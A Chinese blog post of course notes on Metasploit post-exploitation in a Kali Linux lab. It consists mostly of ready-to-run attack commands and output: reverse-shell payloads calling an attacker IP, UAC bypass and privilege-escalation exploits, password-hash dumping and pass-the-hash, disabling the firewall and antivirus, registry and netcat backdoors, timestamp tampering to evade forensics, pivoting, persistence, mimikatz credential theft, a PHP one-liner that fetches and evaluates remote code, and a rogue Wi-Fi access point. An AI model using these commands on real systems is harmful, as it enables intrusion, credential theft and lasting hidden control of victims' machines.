Kali Linux渗透测试 146 Mestasploit 后渗透测试阶段

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 准备工作

  • 已经获得目标系统控制权后扩大战果

    • 提权
    • 信息收集
    • 渗透内网
    • 永久后门
  • 基于已有 session 扩大战果

    • msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.0.0.128 LPORT=4444 -b “\x00” -e x86/shikata_ga_nai -f exe -o payload.exe
  • kali 监听

    msf > use exploit/multi/handler
    msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(multi/handler) > set LHOST 10.0.0.128
    msf exploit(multi/handler) > exploit -j
    
  • windows 系统执行 payload.exe

  • kali 进入 metepreter

    msf exploit(multi/handler) > sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information             Connection
      --  ----  ----                     -----------             ----------
      1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
    
    msf exploit(multi/handler) > sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information             Connection
      --  ----  ----                     -----------             ----------
      1         meterpreter x86/windows  WIN7-VM\John @ WIN7-VM  10.0.0.128:4444 -> 10.0.0.132:62941 (10.0.0.132)
    
    msf exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...
    
    meterpreter > getuid
    Server username: WIN7-VM\John
    

2. 获取 system 账号权限

  • 提权失败,一般是由于 UAC 限制

    meterpreter > getuid
    Server username: WIN7-VM\John
    meterpreter > load priv
    [-] The 'priv' extension has already been loaded.
    meterpreter > getsystem 
    [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
    [-] Named Pipe Impersonation (In Memory/Admin)
    [-] Named Pipe Impersonation (Dropper/Admin)
    [-] Token Duplication (In Memory/Admin)
    
    
    meterpreter > background
    
  • 绕过 UAC 限制

    • use exploit/windows/local/ask

      use exploit/windows/local/ask
      set payload windows/meterpreter/reverse_tcp
      use exploit/windows/local/ask
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      set FILENAME win_update.exe
      set SESSION 1
      exploit
      

      meterpreter > getsystem
      meterpreter > getuid
      

    • use exploit/windows/local/bypassuac

      use exploit/windows/local/bypassuac
      set SESSION 1
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      show targets
      exploit
      

    • use exploit/windows/local/bypassuac_injection

      use exploit/windows/local/bypassuac_injection
      set SESSION 1
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

  • 利用漏洞直接提权为 system

    • use exploit/windows/local/ms13_053_schlamperei

      use exploit/windows/local/ms13_053_schlamperei
      set SESSION 1
      

    • use exploit/windows/local/ms13_081_track_popup_menu

      use exploit/windows/local/ms13_081_track_popup_menu
      set SESSION 1
      exploit
      

    • use exploit/windows/local/ms13_097_ie_registry_symlink

      use exploit/windows/local/ms13_097_ie_registry_symlink
      set SESSION 1
      set URIPATH /
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      set SRVHOST 10.0.0.128
      exploit
      
    • use exploit/windows/local/ppr_flatten_rec

      use exploit/windows/local/ppr_flatten_rec
      set SESSION 1
      exploit
      

  • 图形化 payload

    • set payload windows/vncinject/reverse_tcp

      use exploit/windows/local/ppr_flatten_rec
      set payload windows/vncinject/reverse_tcp
      set SESSION 1
      set LHOST 10.0.0.128
      set ViewOnly false
      exploit
      

  • 关闭 UAC 功能

    • 获取 hashdump

      meterpreter > hashdump
          Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
          John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
      
    • 尝试利用

      use exploit/windows/smb/psexec
      set RHOST 10.0.0.132
      set SMBUser John
      set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

      报错:Exploit failed [no-access]

    • 需要提前关闭 UAC

      sessions -i 2
      shell
      cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
      shutdown -r -t 0
      

    • 再次利用

      use exploit/windows/smb/psexec
      set RHOST 10.0.0.132
      set SMBUser John
      set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
      set payload windows/meterpreter/reverse_tcp
      set LHOST 10.0.0.128
      exploit
      

4. 基础操作

1. 关闭防火墙

  • 需要管理员或system权限

    netsh advfirewall set allprofiles state on
    netsh advfirewall set allprofiles state off
    

2. 关闭 windefend

  • 查看服务名称

  • 关闭防火墙

    net stop windefend
    

3. bitlocker 加密

  • manage-bde -off C:
  • manage-bde -status C:

4. 关闭 DEP

  • bcdedit.exe /set {current} nx AlwaysOff

5 杀死防病毒软件

  • run killav
  • run post/windows/manage/killav

6. 开启远程桌面服务

# 开启服务
run post/windows/manage/enable_rdp

# 关闭服务
run multi_console_command -rc root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt

# 开启服务
run getgui –e
run getgui -u yuanfh -p pass
run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc

7. 查看远程桌面

  • screenshot
  • use espia
    • screengrab

5. 使用 tokens 攻击域控制器

-tokens
- 用户每次登录,账号绑定临时的tokens
- 访问资源时提交 tokens 进行身份验证,类似于 web cookies
- delegate tokens:交互登录会话
- impersonate tokens:非交互登录会话
- delegate tokens 账号注销后变为 Impersonate Token,权限依然有效

  • Incognito

    • 独立功能的软件,被 msf 集成在 metepreter 中
    • 无需密码或破解或获取密码 hash,窃取 tokens 将自己伪装成其他用户
    • 尤其适用于域环境下提权渗透多操作系统
  • 搭建域环境

    • DC + XP
  • load incognito

    • list_tokens -u
    • impersonate_token lab\administrator
    • 运行以上命令需要 getsystem
      • 本地普通权限用户需要先本地权限
      • use exploit/windows/local/ms10_015_kitrap0d
      • execute -f cmd.exe -i -t # -t:使用当前假冒tokens执行程序
      • shell

8. 注册表

  • 注册表保存着 windows 几乎全部配置参数

    • 如果修改不当,可直接造成系统崩溃
    • 修改前完整备份注册表
    • 某些注册表的修改是不可逆的
  • 常见用途

    • 修改、增加启动项
    • 窃取存储于注册表中的机密信息
    • 绕过文件型病毒查杀
  • 用注册表添加 nc 后门服务(metepreter)

    • meterpreter >
    • upload /usr/share/windows-binaries/nc.exe C:\windows\system32
    • reg enumkey -k HKLM\software\microsoft\windows\currentversion\run
    • reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’
    • reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v nc
  • 打开防火墙端口(metepreter)

    • meterpreter >
    • execute -f cmd -i -H
    • netsh firewall show opmode
    • netsh firewall add portopening TCP 4444 “test” ENABLE ALL
    • shutdown -r -f -t 0
    • nc 10.0.0.132 444
  • 其他注册表项

    • https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart

9. 抓包

  • 抓包(metepreter)
    • load sniffer
    • sniffer_interfaces
    • sniffer_start 2
    • sniffer_dump 2 1.cap / sniffer_dump 2 1.cap
    • 在内存中缓冲区块循环存储抓包(50000包),不写硬盘
    • 智能过滤 metepreter 流量,传输全称使用 SSL/TLS 加密
  • 解码
    • use auxiliary/sniffer/psnuffle
    • set PCAPFILE /root/1.cap

10. 搜索文件

  • search -f *.ini
  • search -d c:\documents\ and\ settings\administrator\desktop\ -f *.docx

11. 破解弱口令

  • John the Ripper 破解弱口令

– use post/windows/gather/hashdump # system 权限的 metepreter
- run # 结果保存在 /tmp 目录下
- use auxiliary/analyze/jtr_crack_fast
- run

12. 擦除痕迹

  • 文件系统访问会留下痕迹。电子取证重点关注
  • 渗透测试和攻击者往往希望销毁文件系统访问痕迹
  • 最好的避免被电子取证发现的方法:不要碰文件系统

    • metepreter 的先天优势所在(完全基于内存)
  • MAC 时间 (Modified / Accessed / Changed)

    • ls -l –time=atime/mtime/ctime 1.txt
    • stat 1.txt
    • touch -d “2 days ago” 1.txt
    • touch -t 1501010101 1.txt
  • MACE:MFT entry

    • MFT:NTFS 文件系统的主文件分配表 Master File Table
    • 通常 1024 字节或2个硬盘扇区,其中存放多项 entry 信息
    • 包含文件大量信息(大小 名称 目录位置 磁盘位置 创建日期)
    • 更多信息可研究文件系统取证分析技术
  • Timestomp (meterpreter)

    • timestomp -v 1.txt
    • timestomp -f c:\autoexec.bat 1.txt
      -b -r # 擦除 MACE 时间信息,目前此参数功能失效
    • -m / -a / -c / -e / -z
    • timestomp -z “MM/DD/YYYY HH24:MI:SS” 2.txt

13. pivoting 跳板 / 枢纽/支点

  • msfvenom 制作 payload
    msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST=kali_firewall LPORT=4444 -b “\x00\xff” -e x86/shikata_ga_nai -f exe -o payload.exe
  • 获取 system 权限

  • 利用已经控制的一台计算机作为入侵内网的跳板

  • 在其他内网计算机看来访问全部来自于跳板
  • run autoroute -s 1.1.1.0/24 # 不能访问外网的被攻击目标内网网段

  • 自动路由现实场景

    • 利用 win7 攻击内网 XP(对比 xp 有无外网访问权的情况)
      – 扫描内网:use auxiliary/scanner/portscan/tcp
  • Pivoting 之端口转发 portfwd

    • 利用已经被控计算机,在kali 与攻击目标之间实现端口转发
    • portfwd add -L LIP -l LPORT -r RIP -p RPORT
    • portfwd add -L 1.1.1.10 -l 445 -r 2.1.1.11 -p 3389
    • portfwd list / delete / flush
  • use exploit/windows/smb/ms08_067_netapi

    • set RHOST 127.0.0.1
    • set LHOST 2.1.1.10
  • use exploit/multi/handler
    • set exitonsession false

14. POST 模块

  • meterpreter >
  • run post/windows/gather/arp_scanner RHOSTS=10.0.0.0/24
  • run post/windows/gather/checkvm
  • run post/windows/gather/credentials/credential_collector
  • run post/windows/gather/enum_applications
  • run post/windows/gather/enum_logged_on_users
  • run post/windows/gather/enum_snmp
  • run post/windows/manage/delete_user USERNAME=yuanfh
  • run post/multi/recon/local_exploit_suggester
  • run post/multi/gather/env
  • run post/multi/gather/firefox_creds
  • run post/multi/gather/ssh_creds
  • run post/multi/gather/check_malware REMOTEFILE=c:\a.exe
  • run hostsedit -e 1.1.1.1,www.baidu.com
  • migrate -N explorer.exe
  • run [tab] [tab]
  • run winenum

  • 自动执行 metepreter 脚本

    • set AutoRunScript hostsedit -e 1.1.1.1,www.baidu.com
    • set InitialAutoRunScript checkvm
  • 自动执行 post 模块

    • set InitialAutoRunScript migrate -n explorer.exe
    • set AutoRunScript post/windows/gather/dumplinks

15 .持久后门

  • 利用漏洞取得的 metepreter 运行内存中,重启失效
  • 重复 exploit 漏洞可能造成服务崩溃
  • 持久后门保证漏洞修复后仍可远程控制

  • metepreter 后门

    • run metsvc -A # 删除 -r
    • use exploit/multi/handler
    • set PAYLOAD windows/metsvc_bind_tcp
    • set LPORT 31337
    • set RHOST 1.1.1.1
  • 持久后门

    • run persistence -h
    • run persistence -X -i 10 -p 4444 -r 10.0.0.128
    • run persistence -U -i 20 -p 4444 -r 10.0.0.128
    • run persistence -S -i 20 -p 4444 -r 10.0.0.128

16. msf 延伸用法之 mimikatz

  • hashdump 使用的就是 mimikatz 的部分功能
    • getsystem
    • load mimikatz
    • wdigest ��kerberos ��msv ��ssp ��tspkg ��livessp
    • mimikatz_command -h
    • mimikatz_command -f a::
    • mimikatz_command -f samdump::hashes
    • mimikatz_command -f handle::list
    • mimikatz_command -f service::list
    • mimikatz_command -f crypto::listProviders
    • mimikatz_command -f winmine::infos # 扫雷游戏

17. 代码执行漏洞

  • PHP shell

    • msfvenom -p php/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=3333 -f raw -o a.php
    • msf 启动侦听
    • 上传到web站点并通过浏览器访问
  • web Delivery

    • 利用代码执行漏洞访问攻击者服务器
    • use exploit/multi/script/web_delivery
    • set target 1
    • run
    • php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://1.1.1.1/fTYWqmu‘));”

18. RFI 远程文件包含

  • vi /etc/php5/cgi/php.ini
    • allow_url_fopen = On
    • allow_url_include = On
  • use exploit/unix/webapp/php_include
  • set RHOST 1.1.1.2
  • set PATH /dvwa/vulnerabilities/fi/
  • set PHPURI /?page=XXpathXX
  • set HEADERS “Cookie:security=low;PHPSESSID=eefcf023ba61219d4745ad7487fe81d7”
  • set payload php/meterpreter/reverse_tcp
  • set lhost 1.1.1.1
  • exploit

18. Karmetasploit

  • 伪造 AP、嗅探密码、接货数据、浏览器攻击
  • 多漏洞资源文件:wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt

  • 安装其他依赖包

    • gem install activerecord sqlite3-ruby
  • 基础架构安装配置

    • apt-get install isc-dhcp-server
    • cat /etc/dhcp/dhcpd.conf
      option domain-name-servers 10.0.0.1; default-lease-time 60;
      max-lease-time 72;
      ddns-update-style none;
      authoritative;
      log-facility local7;
      subnet 10.0.0.0 netmask 255.255.255.0 {
      range 10.0.0.100 10.0.0.254;
      option routers 10.0.0.1;
      option domain-name-servers 10.0.0.1;
      }
  • 伪造 AP

    • airmon-ng start wlan0
    • airbase-ng -P -C 30 -e “FREE” -v wlan0mon
    • ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
    • touch /var/lib/dhcp/dhcpd.leases
    • dhcpd -cf /etc/dhcp/dhcpd.conf at0
  • 启动 Karmetasploit

    • msfconsole -q -r karma.rc_.txt
  • 允许用户正常上网

    • vi karma.rc_.txt

      文件链接:https://pan.baidu.com/s/1ShLYDGaoIo9M-ihU0iN8Eg 密码:tpc0

    • 删除 setg 参数

    • 增加 browser_autopwn2 等其他模块
    • 检查恶意流量:auxiliary/vsploit/malware/dns*
  • 启动 Karmetasploit

    • msfconsole -q -r karma.rc_.txt
  • 增加路由和防火墙规则

    • echo 1 > /proc/sys/net/ipv4/ip_forward
    • iptables -P FORWARD ACCEPT
    • iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

你可能感兴趣的:(kali-linux)